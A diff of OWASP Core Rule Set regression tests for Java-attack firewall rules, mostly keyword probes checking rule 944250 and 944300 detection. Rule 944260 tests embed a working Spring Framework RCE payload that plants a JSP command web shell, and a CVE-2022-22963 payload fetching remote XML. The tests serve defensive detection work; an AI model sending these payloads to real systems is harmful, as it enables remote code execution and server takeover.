Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-19 - desc: "Content-Type text/plain includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.evil.processbuilder" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-20 - desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.evil.processbuilder\"}" - output: - log_contains: "id \"944250\"" - - - - test_title: 944250-21 - desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.evil.processbuilder\": \"test\"}" - output: - log_contains: "id \"944250\"" +meta: + author: "spartantri" + enabled: true + name: "944250.yaml" + description: "Positive tests for rule 944250" +tests: + - test_title: 944250-1 + desc: "Argument test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-2 + desc: "Argument name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-3 + desc: "Cookie test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-4 + desc: "Cookie name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-5 + desc: "Request header test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-6 + desc: "XML attribute value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-7 + desc: "XML element value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-8 + desc: "Nested XML element value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-9 + desc: "Content-Type text/plain includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-10 + desc: "Content-Type application/json arg value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.runtime\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-11 + desc: "Content-Type application/json arg name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.runtime\": \"test\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-12 + desc: "Argument test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-13 + desc: "Argument name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-14 + desc: "Cookie test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-15 + desc: "Cookie name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.processbuilder=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-16 + desc: "Request header test includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.processbuilder + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-17 + desc: "XML attribute value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-18 + desc: "XML element value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-19 + desc: "Nested XML element value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-20 + desc: "Content-Type text/plain includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.processbuilder" + output: + log_contains: "id \"944250\"" + - test_title: 944250-21 + desc: "Content-Type application/json arg value includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.evil.processbuilder\"}" + output: + log_contains: "id \"944250\"" + - test_title: 944250-22 + desc: "Content-Type application/json arg name includes keyword java.evil.processbuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.evil.processbuilder\": \"test\"}" + output: + log_contains: "id \"944250\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml new file mode 100644 index 0000000000..664061d104 --- /dev/null +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml @@ -0,0 +1,39 @@ +--- +meta: + author: "theMiddle" + enabled: true + name: "944260.yaml" + description: "Positive tests for rule 944260" +tests: + - test_title: 944260-1 + desc: "CVE-2022-22963" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.1" + data: "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://127.1.2.3/wb.xml')" + output: + log_contains: "id \"944260\"" + - test_title: 944260-2 + desc: "Spring Framework RCE" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.1" + data: "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" + output: + log_contains: "id \"944260\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml index 2b1f6b6332..4106730f76 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml @@ -1,7657 +1,6367 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944300.yaml" - description: "Positive tests for rule 944300" - tests: - - - test_title: 944300-0 - desc: "Argument test includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-1 - desc: "Argument name includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "cnVudGltZQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-2 - desc: "Cookie test includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cnVudGltZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-3 - desc: "Cookie name includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cnVudGltZQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-4 - desc: "Request header test includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cnVudGltZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-5 - desc: "XML attribute value includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-6 - desc: "XML element value includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-7 - desc: "Nested XML element value includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-8 - desc: "Content-Type text/plain includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=cnVudGltZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-9 - desc: "Content-Type application/json arg value includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"cnVudGltZQ\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-10 - desc: "Content-Type application/json arg name includes keyword cnVudGltZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"cnVudGltZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-11 - desc: "Argument test includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-12 - desc: "Argument name includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "HJ1bnRpbWU=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-13 - desc: "Cookie test includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HJ1bnRpbWU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-14 - desc: "Cookie name includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HJ1bnRpbWU=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-15 - desc: "Request header test includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HJ1bnRpbWU - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-16 - desc: "XML attribute value includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-17 - desc: "XML element value includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-18 - desc: "Nested XML element value includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-19 - desc: "Content-Type text/plain includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: 